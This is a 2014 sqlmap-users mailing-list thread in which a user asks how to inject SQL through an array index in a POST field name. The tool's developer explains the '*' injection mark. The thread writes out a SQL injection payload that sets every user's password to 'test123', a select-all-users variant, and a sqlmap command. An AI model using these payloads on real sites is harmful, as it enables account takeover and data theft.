>>> On Thu, Oct 23, 2014 at 5:14 AM, a dehqan <deh...@gm...> wrote:
>>> Thanks man ;
>>>
>>> I want to send an array with query in its index as value of "name" POST variable .
>>>
>>> Remember if i want inject it manually should try >
>>> <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass= 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text required error">
>>>
>>> So tried (sqlmap/1.0-dev) :
>>>
>>> python sqlmap.py -u "http://localhost//?id=n&ssid=w" --data="name[0*]=name" --risk=3 --flush-session --dbms=mysql
>>>
>>>
>>> Sqlmap returns this error:
>>>
>>> [WARNING] (custom) POST parameter '#1*' is not injectable
>>>
>>> What does # mean here ?
>>>
>>> And how to make it work under sqlmap ?
>>>
>>> Regards
>>>
>>>> On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>> Hi.
>>>>
>>>> You need to put a custom injection mark * at the place where you want sqlmap to inject. For example:
>>>>
>>>> ...name[1*]
>>>>
>>>> Bye
>>>>
>>>> p.s. your example with SELECT is not a proper one as queries are usually not supported in stacking
>>>>
>>>>> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <deh...@gm...> wrote:
>>>>> Hi Guys ,
>>>>>
>>>>> Is Sqlmap able to send an array instead of string while injecting?
>>>>>
>>>>> Like situation we have html form and we want manually send post variable 'name' this way (value is obtained from array) :
>>>>>
>>>>> name="name[1 ;select * from users -- ]
>>>>>
>>>>> I want do it with Sqlmap , but how ?
>>>>>
>>>>>
>>>>> Regards dehqan
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>>
>>> ------------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
48 messages has been excluded from this view by a project administrator.
